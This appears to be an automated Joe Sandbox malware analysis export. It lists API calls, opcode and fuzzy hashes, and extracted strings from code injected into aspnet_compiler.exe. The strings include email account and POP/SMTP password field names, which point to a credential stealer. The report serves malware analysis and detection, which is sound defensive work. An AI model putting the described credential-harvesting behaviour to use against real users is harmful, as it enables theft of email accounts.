                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                        • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                        • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                        • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                        APIs
                                        • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                        • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                        • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                        • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                        APIs
                                        • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                        • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                        • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                        • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                        • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                        • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                        • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                        APIs
                                        • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                        • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                        • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                        • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                        APIs
                                        • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID:
                                        • API String ID: 1174141254-0
                                        • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                        • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                        • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                        • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                        APIs
                                        • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                        • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                        • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                        • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                        APIs
                                        • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                        • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                        • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                        • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                        • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                        • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                        • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                        APIs
                                        • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                        • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                        • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                        • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                        APIs
                                        • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                        • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                        • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                        • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                        APIs
                                        • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                        • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                        • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                        • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0040438F
                                        • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                        • VariantInit.OLEAUT32(?), ref: 004043C4
                                        • SysAllocString.OLEAUT32(?), ref: 004043CD
                                        • VariantInit.OLEAUT32(?), ref: 00404414
                                        • SysAllocString.OLEAUT32(?), ref: 00404419
                                        • VariantInit.OLEAUT32(?), ref: 00404431
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InitVariant$AllocString$CreateInitializeInstance
                                        • String ID:
                                        • API String ID: 1312198159-0
                                        • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                        • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                        • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                        • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                        • API String ID: 0-2111798378
                                        • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                        • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                        • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                        • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                        • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                                        • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                        • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                        • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                                        • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                        • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                        • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                        • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                        • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64